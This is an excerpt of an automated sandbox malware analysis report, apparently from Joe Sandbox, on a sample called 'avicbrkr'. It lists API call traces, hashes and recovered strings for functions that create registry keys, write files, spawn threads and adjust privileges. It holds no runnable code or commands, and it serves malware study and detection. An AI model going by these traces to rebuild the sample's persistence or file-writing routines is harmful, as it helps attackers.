                      • Opcode Fuzzy Hash: 8f7a231bbf3470d0a02444d4d364a2764b142eba9002efbe7d0570c62530b107
                      • Instruction Fuzzy Hash: 2951BF71650706AFDB22EF24D884BEAB7A8FF04700F11456AEA04DA290E771A981CB95
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GetLastError.KERNEL32 ref: 0038FD67
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • GetLastError.KERNEL32 ref: 0038FCDB
                      • WaitForSingleObject.KERNEL32(00000000), ref: 0038FCEB
                      • GetLastError.KERNEL32 ref: 0038FD0B
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 0038FD85: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,00000004,00000002,?,00000016,00000000,00000000,00000004,00000004,?,20000013,00000000), ref: 0038FE5E
                        • Part of subcall function 0038FD85: GetLastError.KERNEL32 ref: 0038FE78
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$Heap$AllocateFreeObjectSingleWait
                      • String ID: gU9
                      • API String ID: 2990221422-705701294
                      • Opcode ID: 2f9fc69a4f80cd8c092b26ae4310329d8cc74b3410213250a69dbc7b5b445047
                      • Instruction ID: af641f6c8f6af88993abd3de56d9bd0f746bdef7bd49a40d8248893540e12924
                      • Opcode Fuzzy Hash: 2f9fc69a4f80cd8c092b26ae4310329d8cc74b3410213250a69dbc7b5b445047
                      • Instruction Fuzzy Hash: 98411BB5D00309EFDF22AFA4C9849ADBBB9EF08345F2144BAE902E7254D7319E45DB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 00371F02: InterlockedExchange.KERNEL32(0039D190,00000000), ref: 00371F0A
                      • HeapFree.KERNEL32(00000000,0039D418), ref: 0037DC24
                      • RtlRemoveVectoredExceptionHandler.NTDLL(0039D264), ref: 0037DC5A
                      • ReleaseMutex.KERNEL32(0039D260,?,0039D270,?,00000000,003713EB), ref: 0037DC70
                      • LocalFree.KERNEL32(?,0039D270,?,00000000,003713EB), ref: 0037DCCD
                        • Part of subcall function 0037E58B: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0037E594
                        • Part of subcall function 0037E58B: Sleep.KERNEL32(0000000A,?,0039D270,?,00000000,003713EB), ref: 0037E59E
                        • Part of subcall function 0037E58B: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0037E5C9
                        • Part of subcall function 0038ACED: RtlLeaveCriticalSection.NTDLL(003713EB), ref: 0038AD27
                        • Part of subcall function 0038ACED: HeapFree.KERNEL32(00000000,003713EB), ref: 0038AD36
                        • Part of subcall function 0038C515: SwitchToThread.KERNEL32(?,0039D270,?,00000000,003713EB), ref: 0038C540
                        • Part of subcall function 0038C515: memset.NTDLL ref: 0038C575
                        • Part of subcall function 0038C515: memset.NTDLL ref: 0038C58C
                        • Part of subcall function 0038C515: memset.NTDLL ref: 0038C5A3
                        • Part of subcall function 003882D6: GetVersion.KERNEL32(0039D270,00000000,003971C8,?,0037DB84,?,0039D270,?,00000000,003713EB), ref: 003882FA
                        • Part of subcall function 003882D6: GetModuleHandleA.KERNEL32(0039E8AE,0039F057,?,0037DB84,?,0039D270,?,00000000,003713EB), ref: 0038830E
                        • Part of subcall function 003882D6: GetProcAddress.KERNEL32(00000000,?,0037DB84,?,0039D270,?,00000000,003713EB), ref: 00388315
                        • Part of subcall function 003880F9: RtlEnterCriticalSection.NTDLL(0039D4E0), ref: 00388103
                        • Part of subcall function 003880F9: RtlLeaveCriticalSection.NTDLL(0039D4E0), ref: 0038813F
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$Free$HeapLeavememset$Enter$AddressExceptionExchangeHandleHandlerInterlockedLocalModuleMutexProcReleaseRemoveSleepSwitchThreadVectoredVersion
                      • String ID: H}*
                      • API String ID: 1890117700-3236088583
                      • Opcode ID: 447d20e424f9dcf89fd3eae52b0bf5c477ffefee4168470306d2a7268b4df30a
                      • Instruction ID: 7a9d4595a82b35bac0ef7fd08da02fd2c7baae8d5b8fda70bb885b189d46a0ef
                      • Opcode Fuzzy Hash: 447d20e424f9dcf89fd3eae52b0bf5c477ffefee4168470306d2a7268b4df30a
                      • Instruction Fuzzy Hash: 50414D716043069BDB33AB69DD86A1577BDAF04B50F068427E548E72A1CBBAEC40DA60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: _strupr
                      • String ID: dY9
                      • API String ID: 3408778250-2229523707
                      • Opcode ID: 23e6f58b02fdcf5163088752094d30559f60e867593895be0037ab79f8dd162e
                      • Instruction ID: db7652a75d1794cac8a10539fabb297ba8b06a287d54bb257e772b13f27635ab
                      • Opcode Fuzzy Hash: 23e6f58b02fdcf5163088752094d30559f60e867593895be0037ab79f8dd162e
                      • Instruction Fuzzy Hash: 804146718103099FDF22EFA9D885AAEB7B8FF45340F115965F824D6192D734E849CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlen.KERNEL32(00000000,?,?,?,00374C4E,00000000,0039E1CF,0037D7DB,00000000,00000000,00000000), ref: 00372866
                      • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00372879
                      • lstrcpy.KERNEL32(00000004,00000000), ref: 00372897
                        • Part of subcall function 00377D93: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00377DA7
                        • Part of subcall function 00377D93: memcpy.NTDLL(00000000,00377EC2,?,?,00000008,?,00377EC2,00000000,00000000,?), ref: 00377DD0
                        • Part of subcall function 00377D93: RegCloseKey.ADVAPI32(?,?,00377EC2,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00377A4C,00000000), ref: 00377E22
                      • HeapFree.KERNEL32(00000000,00000000,0039E1CF), ref: 003728BD
                        • Part of subcall function 003724A8: lstrlen.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000), ref: 003724BF
                        • Part of subcall function 003724A8: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 003724D2
                        • Part of subcall function 003724A8: lstrcpy.KERNEL32(00000008,00000000), ref: 003724F4
                        • Part of subcall function 003724A8: CreateThread.KERNEL32(00000000,00000000,0037245F,00000000,00000000,00000000), ref: 0037250C
                        • Part of subcall function 003724A8: CloseHandle.KERNEL32(00000000), ref: 00372517
                        • Part of subcall function 003724A8: GetLastError.KERNEL32(?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000,0039E1CF,0037D7DB,00000000,00000000), ref: 0037251F
                        • Part of subcall function 003724A8: HeapFree.KERNEL32(00000000,00000000), ref: 00372530
                        • Part of subcall function 00373EAC: RegCloseKey.ADVAPI32(00000057,?,?,003728FD,0039E1CF,00000000,00000000,00000000,~FvR9,00000000,00397048,?,?,?,00374C4E,00000000), ref: 00373EF7
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Close$AllocateCreateFreelstrcpylstrlen$ErrorHandleLastThreadmemcpy
                      • String ID: ~FvR9
                      • API String ID: 4111979484-3041887914
                      • Opcode ID: be8392e9fc551c31568ed4d5c4f559947d72918a1fc3faf34a4712e74755585d
                      • Instruction ID: 93d7c623d3403dd9415da9c636353a64e36276b04e3f33b656ee37c1f9e1dbeb
                      • Opcode Fuzzy Hash: be8392e9fc551c31568ed4d5c4f559947d72918a1fc3faf34a4712e74755585d
                      • Instruction Fuzzy Hash: 1E31893191021CFADB339F65CC49A9F7EB8EF45B50F158056F909A7260D37A4D40DBA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00375D28: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00375D36
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 003786C1
                      • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00378712
                        • Part of subcall function 00386FE8: GetLastError.KERNEL32 ref: 00387032
                        • Part of subcall function 00386FE8: WaitForSingleObject.KERNEL32(000000C8), ref: 00387057
                        • Part of subcall function 00386FE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?,?), ref: 003870A2
                        • Part of subcall function 00386FE8: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 003870B7
                        • Part of subcall function 00386FE8: SetEndOfFile.KERNEL32(?,?,?,?), ref: 003870C4
                        • Part of subcall function 00386FE8: GetLastError.KERNEL32(?,?,?), ref: 003870D0
                        • Part of subcall function 00386FE8: CloseHandle.KERNEL32(?), ref: 003870DC
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 00378747
                      • HeapFree.KERNEL32(00000000,?), ref: 00378757
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FileHeap$AllocateErrorFreeLastTime$CloseHandleObjectPointerSingleSystemWaitWrite
                      • String ID: https://
                      • API String ID: 106834057-4275131719
                      • Opcode ID: 808a7cd1c3c82632aa7feaf0e2336e058b89ddc8890ee70cc35fcb668c425d2d
                      • Instruction ID: 69614a7c346e841c97aa128f717634782617c31d4ea7a34f28877e6684bb383b
                      • Opcode Fuzzy Hash: 808a7cd1c3c82632aa7feaf0e2336e058b89ddc8890ee70cc35fcb668c425d2d
                      • Instruction Fuzzy Hash: 73315A76510019FFDB129FA4DC89CAEBB7DEF09340B104066F605E7260DB76AE50DBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 0038ED55: memcpy.NTDLL(00000000,00000204,00000204,0037D7B1,00000000,00000000,0038EDCD,0037D7B1,0037D7B1,0037D7B1,00000000,?,?,00374EE9,00000000,00000001), ref: 0038ED73
                        • Part of subcall function 0038ED55: memset.NTDLL ref: 0038EDA5
                      • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 003741A5
                      • lstrcmpi.KERNEL32(00000000,0039F23C), ref: 003741C5
                        • Part of subcall function 00375A61: lstrlen.KERNEL32(00000008,?,?,?,003741E9,00000000,00000000), ref: 00375AC1
                        • Part of subcall function 00375A61: HeapFree.KERNEL32(00000000,00000000), ref: 00375AE3
                        • Part of subcall function 00375A61: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,003741E9,00000000,00000000), ref: 00375AF5
                        • Part of subcall function 00375A61: lstrcpy.KERNEL32(00000020,00000008), ref: 00375B27
                        • Part of subcall function 00375A61: RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375B33
                        • Part of subcall function 00375A61: Sleep.KERNEL32(0000000A), ref: 00375B3D
                        • Part of subcall function 00375A61: RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375B8B
                        • Part of subcall function 00374109: RegCloseKey.ADVAPI32(?,?,?,003741F7,00000000,?,?,00000000,00000000,-00000008), ref: 00374143
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037420A
                      • HeapFree.KERNEL32(00000000,?,?), ref: 0037421B
                        • Part of subcall function 0038E8FE: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E90B
                        • Part of subcall function 0038E8FE: Sleep.KERNEL32(0000000A,?,00397044,0038E984,0039D480,00000000,00397050,0038F19B), ref: 0038E915
                        • Part of subcall function 0038E8FE: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E964
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalHeapSection$Free$EnterLeaveSleepmemcpy$AllocateCloselstrcmpilstrcpylstrlenmemset
                      • String ID: Main
                      • API String ID: 4064754226-521822810
                      • Opcode ID: 3da0178e32272a16cb92d8f63fdb5acfd6a14ef4e924c4169fbd0d203ad72d9b
                      • Instruction ID: 917791917a0e848b7e7edd5ae344a486fe6fca28e3c78e2519ed9480b333c2fd
                      • Opcode Fuzzy Hash: 3da0178e32272a16cb92d8f63fdb5acfd6a14ef4e924c4169fbd0d203ad72d9b
                      • Instruction Fuzzy Hash: 45218135A00208FFCF23AFA5EC85E9E7BB9EB04344F108462F508AA166D735AD559B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?), ref: 003743DC
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00374412
                      • HeapFree.KERNEL32(00000000,?), ref: 0037444B
                      • RegCloseKey.ADVAPI32(?), ref: 00374454
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseFreeOpen
                      • String ID: Main
                      • API String ID: 2210887687-521822810
                      • Opcode ID: b1d750e4d0f1914fa4de8ed5688894c095587d84403c0a98eb8f55ae367d4814
                      • Instruction ID: dfd3a600897adbf0644d97331c21df2e3ec6fad3156005dd9893e5751af1d9df
                      • Opcode Fuzzy Hash: b1d750e4d0f1914fa4de8ed5688894c095587d84403c0a98eb8f55ae367d4814
                      • Instruction Fuzzy Hash: BC11E3B6900119FFDF12AFD5DD85CEEBBBDEB48304F1044A6E601A2120E7769E51EB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlen.KERNEL32(?,00000000,0039CC00,?,00371953,?), ref: 003886DD
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 00388708
                      • lstrcat.KERNEL32(00000000,?), ref: 0038874E
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateHeaplstrcatlstrlen
                      • String ID: k9$R9
                      • API String ID: 745444535-2586805748
                      • Opcode ID: 07efa3d239d2cdd59ae502184e9e351fe334fffda72b7e3806f0b76d39a1e873
                      • Instruction ID: 737ba357dac7dd1126c1ad33eb120f39b3f92e9b764fd8f4d74bd339f814f323
                      • Opcode Fuzzy Hash: 07efa3d239d2cdd59ae502184e9e351fe334fffda72b7e3806f0b76d39a1e873
                      • Instruction Fuzzy Hash: B2018076104742A7D322AB759C98F2BBABCAB84741F554869FA05D2240DF25D8098771
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlEnterCriticalSection.NTDLL(0039D508), ref: 0037B7E3
                      • Sleep.KERNEL32(0000000A,?,?,0037CF37,00000000), ref: 0037B7ED
                      • RtlLeaveCriticalSection.NTDLL(0039D508), ref: 0037B863
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                      • SetEvent.KERNEL32(?,?,0037CF37), ref: 0037B844
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterEventLeaveSleeplstrlenmemcpymemset
                      • String ID: 3O9
                      • API String ID: 3071338061-4052244761
                      • Opcode ID: 7848e6288a3659934eafc09d6b73b83a4a73bb341fe95b709e27f7095d8eddca
                      • Instruction ID: 7b145e00c8a0c5226880793f8a1b2e09e591b1fc37ecc9d899f91b49fc3896ba
                      • Opcode Fuzzy Hash: 7848e6288a3659934eafc09d6b73b83a4a73bb341fe95b709e27f7095d8eddca
                      • Instruction Fuzzy Hash: 0E019E70654304FBDB22AB65EC86F5A7BACFB14705F404022F609DA1A1D7769A00CBA2
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 00372AEC
                        • Part of subcall function 00386EB8: lstrlen.KERNEL32(?,?,00000000,?,00000000,003777E2,?,?,?,?,?,?,?,?,?,00371255), ref: 00386EC7
                      • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00372B8E,?), ref: 00372B1A
                      • lstrlenW.KERNEL32(00000000,?,?,00372B8E,?), ref: 00372B26
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00372B3E
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heaplstrlen$AllocateCreateDirectoryFree
                      • String ID: %APPDATA%\Microsoft\
                      • API String ID: 1351683892-2699254172
                      • Opcode ID: 7e45aa45d2d04363ac77d190ff1d9c72225fc194b404cfd615d6b5116b70bf20
                      • Instruction ID: 0f2a2591954cd89918664699644cfad934eb25d6744f0e24eeb9f644cd7e54dd
                      • Opcode Fuzzy Hash: 7e45aa45d2d04363ac77d190ff1d9c72225fc194b404cfd615d6b5116b70bf20
                      • Instruction Fuzzy Hash: 53016D32111314BBD7139F94DC8AF8A7B6CEB09754F104002F905663A0D7B69D00CB64
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                      • CreateThread.KERNEL32(00000000,00000000,0037E1CA,00000000,00000000,00000000), ref: 0037E282
                      • CloseHandle.KERNEL32(00000000), ref: 0037E28D
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037E29D
                      • GetLastError.KERNEL32(?,00374DBE,00000000,0039E1CA,00000000,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0037E2A3
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseCreateErrorFreeHandleHeapLastThreadlstrlenmemcpymemset
                      • String ID: ~FvR9
                      • API String ID: 3409056091-3041887914
                      • Opcode ID: 9badf497c643c5d1a6b4bcd9835926aa2dd87a7e190ac86165dd9d21ed9d63fb
                      • Instruction ID: b785f5836dc2ac79a43149aee2a2a49fcbc5374570cea7ef40675b14bb16c92f
                      • Opcode Fuzzy Hash: 9badf497c643c5d1a6b4bcd9835926aa2dd87a7e190ac86165dd9d21ed9d63fb
                      • Instruction Fuzzy Hash: 2CF0A732214114BBC2337B26EC0DDAB7F6DDBC9BA1B054863F90ED61A0E6364845D6B0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlenW.KERNEL32(?,00000000,?,.dll,00372C36,?,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00389B3B
                      • lstrlen.KERNEL32(DllRegisterServer,?,L"7), ref: 00389B49
                      • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 00389B5E
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: lstrlen$AllocateHeap
                      • String ID: .dll$DllRegisterServer
                      • API String ID: 3070124600-294589026
                      • Opcode ID: a8dad98b49ba9a331932c162569f7747912f142d4a6bba26120c9f2f6715d8ea
                      • Instruction ID: 0f78d77288b4f720b0cf412dc3d77b335f6f222abd081a4a8d99187e9e545f75
                      • Opcode Fuzzy Hash: a8dad98b49ba9a331932c162569f7747912f142d4a6bba26120c9f2f6715d8ea
                      • Instruction Fuzzy Hash: 9FF037735013207BC7235B69AC88E67BAACEF85755B090577FA05E3365D6258C1086A4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlenW.KERNEL32(00000000,?,!Cc,00633030,00000000,?), ref: 0063420B
                      • lstrlen.KERNEL32(?), ref: 00634216
                      • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0063422B
                      • wsprintfW.USER32 ref: 00634243
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: lstrlen$AllocateHeapwsprintf
                      • String ID: !Cc
                      • API String ID: 2281473501-3374438881
                      • Opcode ID: e6a9db3a8fdbab0c959eaa95bb16786e180404f1e3b4feed4bbf3352f2e4eccb
                      • Instruction ID: 6edf3ce8bc142ea5cc5d7f09d163cdba5666edc2b3009d4dfa24eef40a059e87
                      • Opcode Fuzzy Hash: e6a9db3a8fdbab0c959eaa95bb16786e180404f1e3b4feed4bbf3352f2e4eccb
                      • Instruction Fuzzy Hash: 6FF05432401228BBCB222F95DC059DBBF66EF05791F058121FD09A7221DB319A509BD0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • FileTimeToLocalFileTime.KERNEL32(00000000,003726D4), ref: 0038BF8A
                      • FileTimeToSystemTime.KERNEL32(003726D4,?), ref: 0038BF98
                      • lstrlenW.KERNEL32(?), ref: 0038C056
                        • Part of subcall function 0038BD45: memcpy.NTDLL(00000000,00000000,00010000,00000000,00000000,00000000,00000000,?,0038C085,00000000,-00000032,00000000), ref: 0038BD6F
                      • FileTimeToLocalFileTime.KERNEL32(00000008,003726D4), ref: 0038C0A0
                      • FileTimeToSystemTime.KERNEL32(003726D4,?), ref: 0038C0AE
                        • Part of subcall function 0038AC59: RtlLeaveCriticalSection.NTDLL(00000000), ref: 0038ACD6
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Time$File$HeapLocalSystem$AllocateCriticalFreeLeaveSectionlstrlenmemcpy
                      • String ID:
                      • API String ID: 3654888788-0
                      • Opcode ID: 5c41f5fa223b22b00ee4f415d4cf9096d506291b1b1bb49b3bf73712bf4d4784
                      • Instruction ID: f69a3208d03a6f14b3ceeb0099cec09efc8cbf212407d322bceaff2f2b037c3c
                      • Opcode Fuzzy Hash: 5c41f5fa223b22b00ee4f415d4cf9096d506291b1b1bb49b3bf73712bf4d4784
                      • Instruction Fuzzy Hash: 56712CB191020AEBCB51DFA9C884AEEB7FCBF08344F14446AF505E7251E739DA45DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00372549: lstrlen.KERNEL32(?,?,00000000,00000000,00372CBA,00000000,L"7,?,00000000,?), ref: 00372553
                        • Part of subcall function 00372549: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00372568
                        • Part of subcall function 00372549: HeapFree.KERNEL32(00000000,00000000,00377487), ref: 003725B0
                      • memset.NTDLL ref: 00372CE9
                        • Part of subcall function 003775E0: GetTickCount.KERNEL32(00000000,00000000,00000000,L"7,00372CFD,00000000), ref: 003775F0
                        • Part of subcall function 003775E0: CreateFileW.KERNEL32(00000000,80000000,00000003,0039D2D8,00000003,00000000,00000000), ref: 0037760D
                        • Part of subcall function 003775E0: GetFileSize.KERNEL32(?,00000000,Local\,00000001), ref: 00377639
                        • Part of subcall function 003775E0: CreateFileMappingA.KERNEL32(00000000,0039D2D8,00000002,00000000,00000000,?), ref: 0037764D
                        • Part of subcall function 003775E0: lstrlen.KERNEL32(?), ref: 00377669
                        • Part of subcall function 003775E0: lstrcpy.KERNEL32(?,?), ref: 00377679
                        • Part of subcall function 003775E0: GetLastError.KERNEL32 ref: 00377681
                        • Part of subcall function 003775E0: HeapFree.KERNEL32(00000000,?), ref: 00377694
                        • Part of subcall function 003775E0: CloseHandle.KERNEL32(?), ref: 003776A6
                        • Part of subcall function 003775E0: GetLastError.KERNEL32 ref: 003776AE
                      • CloseHandle.KERNEL32(?), ref: 00372D32
                        • Part of subcall function 00372B4D: RtlImageNtHeader.NTDLL(00000094), ref: 00372B6E
                        • Part of subcall function 00372B4D: CloseHandle.KERNEL32(0039D198), ref: 00372BB7
                        • Part of subcall function 00372B4D: HeapFree.KERNEL32(00000000,?,?), ref: 00372C5E
                        • Part of subcall function 00372B4D: HeapFree.KERNEL32(00000000,?,.dll), ref: 00372C6D
                        • Part of subcall function 0037164D: RtlImageNtHeader.NTDLL(?), ref: 0037165E
                        • Part of subcall function 0037164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 00371685
                        • Part of subcall function 0037164D: GetTickCount.KERNEL32 ref: 0037169C
                        • Part of subcall function 0037164D: wsprintfA.USER32 ref: 003716AC
                        • Part of subcall function 0037164D: RegCreateKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 003716E0
                        • Part of subcall function 0037164D: StrRChrA.SHLWAPI(00000000,00000000,?), ref: 003716FB
                        • Part of subcall function 0037164D: lstrlen.KERNEL32(00000000), ref: 00371705
                        • Part of subcall function 0037164D: RegCloseKey.ADVAPI32(?), ref: 00371721
                        • Part of subcall function 0037164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037172F
                        • Part of subcall function 00371A0C: RtlImageNtHeader.NTDLL ref: 00371A4C
                        • Part of subcall function 00371A0C: GetCurrentThreadId.KERNEL32 ref: 00371A62
                        • Part of subcall function 00371A0C: GetCurrentThread.KERNEL32 ref: 00371A73
                        • Part of subcall function 00371A0C: HeapFree.KERNEL32(00000000,?,00000000), ref: 00371AE7
                        • Part of subcall function 00371A0C: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 00371AF7
                        • Part of subcall function 00371A0C: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 00371B43
                        • Part of subcall function 00371A0C: wsprintfA.USER32 ref: 00371B54
                        • Part of subcall function 00371A0C: lstrlen.KERNEL32(00000000,00000000), ref: 00371B5F
                        • Part of subcall function 00371A0C: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00371B79
                        • Part of subcall function 0037154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 0037155B
                        • Part of subcall function 0037154D: GetLastError.KERNEL32(?,00372DF9), ref: 00371572
                        • Part of subcall function 00371586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0037159D
                        • Part of subcall function 00371586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00372E03,00000094,?), ref: 003715AF
                        • Part of subcall function 00371586: StrChrA.SHLWAPI(00000000,0000003A), ref: 003715BC
                        • Part of subcall function 00371586: wsprintfA.USER32 ref: 003715D0
                        • Part of subcall function 00371586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 003715E6
                        • Part of subcall function 00371586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000,?,?,?), ref: 003715FF
                        • Part of subcall function 00371586: WriteFile.KERNEL32(00000000,00000000,?,?,?), ref: 00371607
                        • Part of subcall function 00371586: GetLastError.KERNEL32(?,?,?), ref: 00371615
                        • Part of subcall function 00371586: CloseHandle.KERNEL32(00000000), ref: 0037161E
                        • Part of subcall function 00371586: GetLastError.KERNEL32(?,00372E03,00000094,?), ref: 0037162F
                        • Part of subcall function 00371586: HeapFree.KERNEL32(00000000,00000000), ref: 0037163F
                        • Part of subcall function 0037BB29: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,003714F5,?,00000000,00000000,00000000,00000006), ref: 0037BB47
                        • Part of subcall function 0037BB29: wsprintfA.USER32 ref: 0037BB65
